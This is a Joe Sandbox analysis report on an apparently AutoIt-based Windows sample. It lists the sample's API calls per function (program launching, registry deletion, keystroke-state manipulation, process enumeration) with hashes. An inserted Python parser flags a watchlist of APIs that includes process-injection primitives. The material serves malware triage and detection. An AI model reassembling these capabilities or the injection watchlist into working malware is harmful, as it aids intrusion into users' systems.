                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 774024439-3081909835
                                                                        • Opcode ID: cb252e5da088ee24d591fc64c854a3673e67185437ba20f5f17d492dc7b28dba
                                                                        • Instruction ID: 8ed662d422bb95e4939c4b21f7a5367df61b7a2124319974b738f8bf3a25d2d6
                                                                        • Opcode Fuzzy Hash: cb252e5da088ee24d591fc64c854a3673e67185437ba20f5f17d492dc7b28dba
                                                                        • Instruction Fuzzy Hash: 7DC180715083409FC724EF24C951E9AB7E4FF86354F00996DF499A72A2DB31ED06CB82
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00EE016D
                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00EE038D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EE03AB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00EE03D6
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EE03FF
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00EE0421
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EE0440
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 3356174886-0
                                                                        • Opcode ID: 5a8e6eeb8f5b0747f76acd3cb880e7629b2ef84829699856f86805778cc9a0d2
                                                                        • Instruction ID: 2c5e6258f01fc3541a98cf97df424eb47e6abea0ded4c2564b253787c598da49
                                                                        • Opcode Fuzzy Hash: 5a8e6eeb8f5b0747f76acd3cb880e7629b2ef84829699856f86805778cc9a0d2
                                                                        • Instruction Fuzzy Hash: C7A1CD3060065AEFDB18CF69C9897BDBBB2FF48714F049115EC54AB290E7B0AD90CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0deb552d632e53a089b0f3d73c709e1f09eaa834ccf81ed9d7341dda0d284df4
                                                                        • Instruction ID: 7502a7c72f1b673cb28e160c13aa22f704b79e71e440f5f513232eb8d9595280
                                                                        • Opcode Fuzzy Hash: 0deb552d632e53a089b0f3d73c709e1f09eaa834ccf81ed9d7341dda0d284df4
                                                                        • Instruction Fuzzy Hash: 4F717D70A04109EFDB14DF99CC49ABEBB79FF89314F148159FA19B6250C734AA41CF61
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00ED225A
                                                                        • _memset.LIBCMT ref: 00ED2323
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00ED2368
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ED242F
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00ED243E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 4082843840-2766056989
                                                                        • Opcode ID: 17cf1199f8bccf6407f702c348704ac02e69ec8f7f7b626e60b6b8074390bd00
                                                                        • Instruction ID: 09d8e04008421a148f32865227ecf5af1dc6eb6c18ade942bf0445b5af94c6ab
                                                                        • Opcode Fuzzy Hash: 17cf1199f8bccf6407f702c348704ac02e69ec8f7f7b626e60b6b8074390bd00
                                                                        • Instruction Fuzzy Hash: 65715B70A006199FCF05EFA4C9819AEBBF5FF48310F10945AE959BB391CB34AE41CB90
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00EB3DE7
                                                                        • GetKeyboardState.USER32(?), ref: 00EB3DFC
                                                                        • SetKeyboardState.USER32(?), ref: 00EB3E5D
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EB3E8B
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EB3EAA
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EB3EF0
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EB3F13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: cab1fee00add6011bd3b0ce3de0e122a4442a30d6aa7f32a01a596a996a7efd5
                                                                        • Instruction ID: eb7341684f372bc70558aec1c97d1e861ca67e3d73a82275d6f78a7466e230f6
                                                                        • Opcode Fuzzy Hash: cab1fee00add6011bd3b0ce3de0e122a4442a30d6aa7f32a01a596a996a7efd5
                                                                        • Instruction Fuzzy Hash: 0D51D3A0A047D53DFB3647388C46BF77EA95B06308F085589E1D5668C3D794DEC8D760
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 00EB3C02
                                                                        • GetKeyboardState.USER32(?), ref: 00EB3C17
                                                                        • SetKeyboardState.USER32(?), ref: 00EB3C78
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EB3CA4
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EB3CC1
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EB3D05
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EB3D26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 6a5e44f3d1d1d7fa5fd231335af18f89c989768bb98a6a89f6d4e5fbdd94785f
                                                                        • Instruction ID: 399b807f6fd44d99e09e4c767bc05eba0cf0b3f3f18e508d53560f4bc7533878
                                                                        • Opcode Fuzzy Hash: 6a5e44f3d1d1d7fa5fd231335af18f89c989768bb98a6a89f6d4e5fbdd94785f
                                                                        • Instruction Fuzzy Hash: 1E5103A05087D53DFB3683748C47BF7BE996B06308F089588E1D57A8C3D694EE88E760
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 647e375c695ac21a0b0a6a2e6f27ada7a3b1e7cb946247953de91a4c92f3c2c9
                                                                        • Instruction ID: a31948ce2b29791be0cac72729a0741effe726996d8846fafa76870d1916828b
                                                                        • Opcode Fuzzy Hash: 647e375c695ac21a0b0a6a2e6f27ada7a3b1e7cb946247953de91a4c92f3c2c9
                                                                        • Instruction Fuzzy Hash: F4418D66D10214BACF11EBF488469CFB3EDEF44310F50A9A6E515F3122FA34E61483A9
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00ED3DA1
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED3DCB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00ED3E80
                                                                          • Part of subcall function 00ED3D72: RegCloseKey.ADVAPI32(?), ref: 00ED3DE8
                                                                          • Part of subcall function 00ED3D72: FreeLibrary.KERNEL32(?), ref: 00ED3E3A
                                                                          • Part of subcall function 00ED3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ED3E5D
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ED3E25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 93aa08a70d862625a9d60461d15e5e540711029bb79272e40e3cf297b4bad2de
                                                                        • Instruction ID: 8995bf76b340ad8c905965560eafc7b3b9f898ee931f637ac3fc9a29129434af
                                                                        • Opcode Fuzzy Hash: 93aa08a70d862625a9d60461d15e5e540711029bb79272e40e3cf297b4bad2de
                                                                        • Instruction Fuzzy Hash: 9D310DB1901209BFDB159BA1DC85AFFBBBDEF48304F00116AE512F2290DA709F49DB61
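The per-function records above (for instance the ShellExecuteExW launcher at 00ED2368 and the recursive RegDeleteKeyW helper at 00ED3D72) are easier to triage once they are parsed into call sequences ordered by call-site address and matched against a watchlist. The Python below is an added example, not Joe Sandbox tooling: it infers the record layout from the text on this page, its sample input is a constructed copy of two of the records above, and the watchlist is the example's own choice.

```python
"""Parse Joe Sandbox per-function summary records ('APIs' / 'Similarity'
blocks) into API call sequences and flag watchlisted APIs.
Added example, not Joe Sandbox code; layout inferred from this report page."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this page, with the repeated
# 'Associated' and IDA-plugin lines dropped.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 00ED225A
• _memset.LIBCMT ref: 00ED2323
• ShellExecuteExW.SHELL32(?), ref: 00ED2368
  • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
• CloseHandle.KERNEL32(00000000), ref: 00ED242F
• FreeLibrary.KERNEL32(00000000), ref: 00ED243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 17cf1199f8bccf6407f702c348704ac02e69ec8f7f7b626e60b6b8074390bd00
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00ED3DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED3DCB
• FreeLibrary.KERNEL32(00000000), ref: 00ED3E80
  • Part of subcall function 00ED3D72: RegCloseKey.ADVAPI32(?), ref: 00ED3DE8
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00ED3E25
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 93aa08a70d862625a9d60461d15e5e540711029bb79272e40e3cf297b4bad2de
"""

@dataclass
class ApiCall:
    name: str     # e.g. ShellExecuteExW
    module: str   # e.g. SHELL32, or LIBCMT for the statically linked CRT
    args: str     # argument list as printed ('' if none)
    ref: str      # call-site address
    subcall: str  # callee address for 'Part of subcall function' lines, else ''

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    ids: dict = field(default_factory=dict)  # 'API ID', 'Opcode ID', 'Source File', ...
    hits: set = field(default_factory=set)   # watchlisted API names seen

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
ID_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_records(text):
    """One FunctionRecord per function. 'APIs' always opens a record;
    'Memory Dump Source' opens one only if the current record already has
    a dump section (the report emits such records for functions with no APIs)."""
    records, cur, seen_dump = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or seen_dump)):
            cur = FunctionRecord()
            records.append(cur)
            seen_dump = line == "Memory Dump Source"
            continue
        if line == "Memory Dump Source":
            seen_dump = True
            continue
        if line in HEADERS or cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["mod"], m["args"] or "", m["ref"], m["sub"] or ""))
            continue
        m = ID_RE.match(line)
        if m and m["key"] != "Associated":
            cur.ids[m["key"]] = m["val"]
    return records

def direct_api_sequence(rec):
    """APIs the function calls itself, in call-site address order. The listing
    is not address-ordered (FreeLibrary at 00ED3E80 is printed before
    RegDeleteKeyW at 00ED3E25), so sort by the ref address."""
    own = [c for c in rec.apis if not c.subcall]
    return [c.name for c in sorted(own, key=lambda c: int(c.ref, 16))]

# Watchlist is this example's own choice: APIs on this page worth a second
# look, plus two common injection primitives.
WATCHLIST = frozenset({"ShellExecuteExW", "RegDeleteKeyW", "SetKeyboardState",
                       "WriteProcessMemory", "CreateRemoteThread"})

def flag_records(records, watchlist=WATCHLIST):
    """Store watchlisted names (direct or via subcall) on each record; return the hits."""
    for rec in records:
        rec.hits = {c.name for c in rec.apis if c.name in watchlist}
    return [r for r in records if r.hits]

if __name__ == "__main__":
    for rec in flag_records(parse_records(SAMPLE)):
        print(rec.ids.get("Opcode ID", "")[:16], direct_api_sequence(rec), sorted(rec.hits))
```

Sorting by the ref address matters when reading these records as a call sequence: the plugin prints subcall lines and some direct calls out of address order, so the printed order is not the order in which the function body reaches them.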
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED8FE7
                                                                        • GetWindowLongW.USER32(015DEC60,000000F0), ref: 00ED901A
                                                                        • GetWindowLongW.USER32(015DEC60,000000F0), ref: 00ED904F
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00ED9081
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00ED90AB
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED90BC
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00ED90D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: f97e3454413b6cceeb825a32fd6bfbd39ac73aa06e1078033c9dfe21941a1783
                                                                        • Instruction ID: bc0912be71e17eeb2bf416654a7e6c8f9d0054dac3a4315d4accabfc7aef4cb8
                                                                        • Opcode Fuzzy Hash: f97e3454413b6cceeb825a32fd6bfbd39ac73aa06e1078033c9dfe21941a1783
                                                                        • Instruction Fuzzy Hash: ED314834604214DFDB218F98EC85F6437A6FB8A328F155266F519EB2B2CB71AC45EB40
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB08F2
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB0918
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EB091B
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0939
                                                                        • SysFreeString.OLEAUT32(?), ref: 00EB0942
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00EB0967
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0975
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 31e051710f5f63ec333d9058b7ade1ff2d3bf48415438c4b258b86e9363a7602
                                                                        • Instruction ID: 0ec0abde601afd08b97ee6279e4e89de360cf0c732c265924439d460891e8c6c
                                                                        • Opcode Fuzzy Hash: 31e051710f5f63ec333d9058b7ade1ff2d3bf48415438c4b258b86e9363a7602
                                                                        • Instruction Fuzzy Hash: 6721A172605208AFEB109FA9CC88DFF77ACEB88364B008125F919EB151D670ED45CB60
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 423b8dc91f224305163b3c41508b4a9728dbcd69c4fca79e7b1d828c72c477dd
                                                                        • Instruction ID: fbfab2f52026688c4586daa3eac3b0350071759859f2401d15cc959e5b5a9e38
                                                                        • Opcode Fuzzy Hash: 423b8dc91f224305163b3c41508b4a9728dbcd69c4fca79e7b1d828c72c477dd
                                                                        • Instruction Fuzzy Hash: 432167322012116BC630AA649C02FFB73D9EF69304F60642DF64AB7081E6659942E3A2
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB09CB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB09F1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EB09F4
                                                                        • SysAllocString.OLEAUT32 ref: 00EB0A15
                                                                        • SysFreeString.OLEAUT32 ref: 00EB0A1E
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00EB0A38
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0A46
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 06ec16704a6b2091f479f61bfa492fbe378912de8f0e975119a2a4b8facc70c9
                                                                        • Instruction ID: 3d94cd14bf9385b7292f00a46f280fdb56197c7f345a1aee35e78fbe0f94ede0
                                                                        • Opcode Fuzzy Hash: 06ec16704a6b2091f479f61bfa492fbe378912de8f0e975119a2a4b8facc70c9
                                                                        • Instruction Fuzzy Hash: F3216075204204AFDB10DBA9DC89DBF77ECEF483607408525F919EB2A1E670ED45CB64
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EDA32D
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EDA33A
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EDA345
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EDA354
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EDA360
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 2b80500e68cce8860ba7e2a61c74b3af80eb2d4a843ca0a9e1610a9fd4ba822e
                                                                        • Instruction ID: f33ad7009a3d916543f18e865f0ef4ccd85d77616e15b499e32c9f773fc57025
                                                                        • Opcode Fuzzy Hash: 2b80500e68cce8860ba7e2a61c74b3af80eb2d4a843ca0a9e1610a9fd4ba822e
                                                                        • Instruction Fuzzy Hash: D51193B1150219BEEF115F60CC85EEB7F6EFF08798F015115BA08A61A0C6729C22DBA4
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 00E8CCF6
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8CD37
                                                                        • ScreenToClient.USER32(?,?), ref: 00E8CD5F
                                                                        • GetClientRect.USER32(?,?), ref: 00E8CE8C
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8CEA5
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: c10cb005d563e48bbd06842a41d2e800afde146745affd4b02355790d932900c
                                                                        • Instruction ID: ce6791ac1f90256404fe57a1c83ea62a3d3c9aa94be41edf9a8f98dac4b4aa4b
                                                                        • Opcode Fuzzy Hash: c10cb005d563e48bbd06842a41d2e800afde146745affd4b02355790d932900c
                                                                        • Instruction Fuzzy Hash: EFB14779900649DBDB10DFA9C5807EEBBB1FF09314F24A12AEC5DEB250DB30A950CB64
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00ED1C18
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00ED1C26
                                                                        • __wsplitpath.LIBCMT ref: 00ED1C54
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscat.LIBCMT ref: 00ED1C69
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00ED1CDF
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00ED1CF1
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1380811348-0
                                                                        • Opcode ID: 1a61af18707169c25ce50459b775bb1b51d0a2bfa19133dfbddbd431678b44ec
                                                                        • Instruction ID: 4b75fb6c12332eb61976decca522080109383dd5579e98ede558d6f642c57496
                                                                        • Opcode Fuzzy Hash: 1a61af18707169c25ce50459b775bb1b51d0a2bfa19133dfbddbd431678b44ec
                                                                        • Instruction Fuzzy Hash: BC516E71108340AFD720EF24CC85EABB7ECEF88754F10595EF589A7251EB70AA05CB92
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED30AF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED30EF
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00ED3112
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00ED313B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00ED317E
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED318B
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3451389628-0
                                                                        • Opcode ID: 7fc8407e062fd85e7f02d357acd107b45fd273b937bb6a461cab1316f63a801a
                                                                        • Instruction ID: f710fbe1c72f294437de6b733474fe820e45bb92165c7693bf1ff21e1a65432c
                                                                        • Opcode Fuzzy Hash: 7fc8407e062fd85e7f02d357acd107b45fd273b937bb6a461cab1316f63a801a
                                                                        • Instruction Fuzzy Hash: 91513A31108200AFC714EF64CC95E6ABBF9FF89304F04995EF599A72A1DB71DA06CB52
                                                                        APIs
                                                                        • GetMenu.USER32(?), ref: 00ED8540
